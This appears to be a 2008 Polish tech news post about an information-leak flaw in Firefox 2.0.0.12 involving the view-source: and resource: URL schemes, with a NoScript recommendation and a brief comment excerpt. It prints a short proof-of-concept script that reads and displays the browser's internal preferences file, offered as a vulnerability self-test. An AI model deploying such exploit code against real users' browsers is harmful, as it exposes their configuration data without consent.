37

Firefox 2.0.0.12 podatny na atak?

10 lutego 2008, michuk
Tagi:

Jak donosi bloger Ronald van den Heetkamp, dopiero co wydany Firefox 2.0.0.12 jest podatny na atak. Obwinia też twórców za zbyt lekkie podchodzenie do kwestii bezpieczeństwa.

Błąd polega na tym, że korzystając ze schematów ‘view-source:’ i ‘resource:’ możliwe jest odczytanie dowolnego pliku znajdującego się w katalogu głównym Firefoksa. To natomiast umożliwia odcztanie dowolnych jego ustawień, w tym konfiguracji sieci, ciasteczek, historii przeglądanych stron, etc.
Aktualizacja: jak podaje shaver.off.net nie jest jednak na szczęście możliwe uzyskanie dostępu do prywatnych danych.

Do czasu wydania poprawki polecana jest instalacja wtyczki NoScript. Zaaplikowanie następującego kodu pozwoli sprawdzić, czy nadal jesteśmy podatni na atak:

<script>
/*
 @name: Firefox <= 2.0.0.12 information leak pOc
 @date: Feb. 07 2008
 @author: Ronald van den Heetkamp
 @url: http://www.0x000000.com
*/
pref = function(a,b) {
   document.write( a + ' -> ' + b + '<br />');
};
</script>
<script src="view-source:resource:///greprefs/all.js"></script>
Więcej informacji: http://www.0x000000.com/index.php?i=515
Jeśli uważasz, że ten nius jest nieobiektywny, przedstawia nieprawdziwe wydarzenie, jest spamem lub nie spełnia standardów serwisu, napisz raport.

Komentarze (RSS)

Liczba komentarzy: 29

zwiń wątek Rodzyn  10 lutego 2008 o godz. 19:06 #
Fatal error: Call to undefined function ck_display_karma() in /var/www/ln20/wp-content/themes/mwd/comments.php on line 61